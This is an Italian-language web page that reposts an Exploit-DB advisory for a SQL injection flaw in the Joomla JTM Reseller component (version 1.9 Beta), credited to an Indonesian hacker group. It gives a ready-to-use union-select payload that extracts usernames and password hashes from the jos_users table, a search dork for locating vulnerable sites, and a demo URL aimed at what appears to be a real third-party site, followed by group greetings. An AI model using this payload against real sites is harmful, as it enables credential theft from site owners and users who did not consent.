Sei qui: Servizi 
Sicurezza CMS Vulnerabilità Joomla Component JTM Reseller SQL injection vulnerability
Sicurezza CMS Vulnerabilità Joomla Component JTM Reseller SQL injection vulnerability
Creato Venerdì, 23 Aprile 2010 09:03
# EDB-ID: 12306
# CVE-ID: ()
# OSVDB-ID: ()
# Author: kaMtiEz
# Published: 2010-04-20
# Verified: yes
# Download Exploit Code
# Download Vulnerable app
[!]===========================================================================[!] |
[~] Joomla Component JTM Reseller SQL injection vulnerability |
[~] Author : kaMtiEz (
Questo indirizzo email è protetto dagli spambots. E' necessario abilitare JavaScript per vederlo.
) |
[~] Homepage : http://www.indonesiancoder.com |
[~] Date : 20 april, 2010 |
[!]===========================================================================[!] |
[ Software Information ] |
[+] Vendor : http://www.jtmreseller.com/index.php?option=com_jtm&view=search&view=search&author= |
[+] Price : free |
[+] Vulnerability : SQL |
[+] Dork : inurl:"CIHUY" ;) |
[+] Download : http://www.jtmreseller.com/index.php?option=com_content&view=article&id=2&Itemid=4 |
[+] Version : 1.9 Beta |
[!]===========================================================================[!] |
[ Vulnerable File ] |
http://127.0.0.1/index.php?option=com_jtm&view=search&view=search&author=[INDONESIANCODER] |
[ XpL ] |
-666/**/union/**/all/**/select/**/concat_ws(0x3a,username,password)/**/from/**/jos_users--&task=search |
[ d3m0 ] |
http://999k.idv.tw/index.php?option=com_jtm&view=search&author=-666/**/union/**/all/**/select/**/concat_ws(0x3a,username,password)/**/from/**/jos_users--&task=search |
etc etc etc ;] |
[!]===========================================================================[!] |
[ Thx TO ] |
[+] INDONESIAN CODER TEAM MainHack ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW |
[+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot |
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck |
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,yur4kh4 |
[ NOTE ] |
[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM |
[+] jika kami bersama nyalakan tanda bahaya :) |
[+] Ayy : Ceped sembuh bebh .. lup u :"> |
[+] Don Tukulesto and Acild : thanks for coming in my t0wn :D |
[ QUOTE ] |
[+] INDONESIANCODER still r0x |
[+] nothing secure .. |
Categoria: Vulnerabilità Joomla